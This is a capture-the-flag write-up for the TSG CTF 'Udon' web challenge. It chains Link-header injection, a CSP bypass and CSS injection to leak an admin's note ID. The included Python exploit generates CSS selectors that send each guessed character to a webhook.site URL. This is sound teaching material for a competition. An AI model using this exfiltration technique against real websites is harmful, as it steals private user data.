CTFtime.org

Udon

by Ark / ./Vespiary

Rating:

My detailed writeup in Japanese is [here](https://blog.arkark.dev/2021/10/06/tsgctf/).

## Solution

- We can embed one HTTP header in any response from the service.
- `Content-Security-Policy: script-src 'self'; style-src 'self'; base-uri 'none'`

We can attack with CSS Injection and CSP Bypass using Link header as follows:

1. Create the following note:
```css
{} * { background: black; }
```
2. Access to the following URL:
```javascript
location = "http://34.84.69.72:8080/?k=Link&v=" + encodeURIComponent("<http://34.84.69.72:8080/notes/zibXjydLKQ?k=Content-Type&v=" + encodeURIComponent("text/css; charset=utf-8") + ">; rel=\"stylesheet\"")
```

Then, a browser imports the above CSS and displays the background in black. This attack only works in Firefox.

I wrote an exploit code:

```python
import httpx
from urllib.parse import quote

# base_url = "http://localhost:8080"
base_url = "http://34.84.69.72:8080"
base_ssrf_url = "http://app:8080"

hook_url = "https://webhook.site/xxx-xxx-xxx-xxx-xxx"

chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"

suffix = "R1cmOAtdG"
n = 1

def f(n: int):
note_description = "{}\n"

def rec(d: int, s: str) -> list[str]:
if d == n:
return [s]
else:
return sum([rec(d+1, s+c) for c in chars], [])

for c in rec(0, ""):
note_description += "li a[href$={{value}}] { background: url({{hook_url}}/{{value}}) }\n".replace("{{value}}", c + suffix).replace("{{hook_url}}", hook_url)

res = httpx.post(
base_url + "/notes",
data={
"title": "xxx",
"description": note_description,
},
allow_redirects=False,
)
assert res.status_code == 302

note_url = base_ssrf_url + res.headers["Location"]
print(note_url)
exploit_path = "/?k=Link&v=" + quote("<" + note_url + "?k=Content-Type&v=" + quote("text/css; charset=utf-8") + ">; rel=\"stylesheet\"")

res = httpx.post(
base_url + "/tell",
data={
"path": exploit_path,
},
allow_redirects=False,
)
assert res.status_code == 302

f(n)
```

I stole the ID of the admin's note by running this program several times.

The ID was `4R1cmOAtdG`. A flag was in `http://34.84.69.72:8080/notes/4R1cmOAtdG`.

## Flag

```
TSGCTF{uo_uo_uo_uo_uoooooooo_uo_no_gawa_love}
```

Comments